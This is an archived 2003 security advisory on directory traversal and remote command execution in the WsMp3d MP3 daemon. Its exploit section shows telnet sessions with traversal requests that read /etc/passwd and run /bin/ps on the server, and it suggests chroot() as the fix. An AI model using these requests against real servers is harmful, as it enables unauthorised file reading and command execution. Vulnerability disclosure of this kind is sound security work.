a-WsMPdvuln.txt

2003-05-23T00:00:00
ID PACKETSTORM:31149
Type packetstorm
Reporter Xpl017Elz
Modified 2003-05-23T00:00:00

Description

                                        
                                            `  
==========================================  
INetCop Security Advisory #2003-0x82-017.a  
==========================================  
  
  
* Title: WsMP3d Directory Traversing Vulnerability  
  
  
0x01. Description  
  
  
WsMp3d is daemon that can enjoy mp3.  
This daemon can approach in web, directory traversing bug exists.  
Also, can execute command in remote.  
  
  
0x02. Vulnerable Packages  
  
  
Vendor site: http://wsmp3.sourceforge.net/  
  
WsMp3-0.0.10.tar.gz version.  
+Linux  
WsMp3-0.0.9.tar.gz version.  
WsMp3-0.0.8.tar.gz version.  
web_server-0.0.7.tar.gz version.  
web_server-0.0.6.tar.gz version.  
web_server-0.0.5.tar.gz version.  
web_server-0.0.4.tar.gz version.  
web_server-0.0.3.tar.gz version.  
web_server-0.0.2.tar.gz version.  
web_server-0.0.1.tar.gz version.  
  
  
0x03. Exploit  
  
  
#1) Directory traversing exploit:  
  
As following, see file in directory.  
  
http://wsmp3.server.com/cmd:ls  
  
In this way, use directory that know.  
  
bash$ telnet wsmp3.server.com 8000  
Trying 61.37.xxx.xx...  
Connected to 61.37.xxx.xx.  
Escape character is '^]'.  
GET /dir/../../../../../../etc/passwd HTTP/1.0  
  
... passwd file here ...  
  
Ok, it's possible to read `/etc/passwd' file !  
If it's executed by root ?? hehehe ;-)  
  
#2) Remote execute command exploit:  
  
bash$ telnet wsmp3.server.com 8000  
Trying 61.37.xxx.xx...  
Connected to 61.37.xxx.xx.  
Escape character is '^]'.  
POST /dir/../../../../../../bin/ps HTTP/1.0  
HTTP/1.1 200 OK  
Connection: close  
Content-Type: text/html  
Date: Sat May 03 01:25:28 2003  
Last-Modified: Sat May 03 01:25:28 2003  
Content-Length: 201  
  
PID TTY TIME CMD  
29529 pts/2 00:00:00 login  
29559 pts/2 00:00:00 su  
29560 pts/2 00:00:00 bash  
29681 pts/2 00:00:10 WsMp3  
29730 pts/2 00:00:00 WsMp3  
29731 pts/2 00:00:00 ps  
Connection closed by foreign host.  
bash$  
  
  
0x04. Patch  
  
  
It can solve as chroot() function. :-)  
  
  
P.S: Sorry, for my poor english.  
  
--  
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.  
  
MSN & E-mail: szoahc(at)hotmail(dot)com,  
xploit(at)hackermail(dot)com  
  
INetCop Security Home: http://www.inetcop.org (Korean hacking game)  
My World: http://x82.i21c.net & http://x82.inetcop.org  
  
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y  
--  
  
`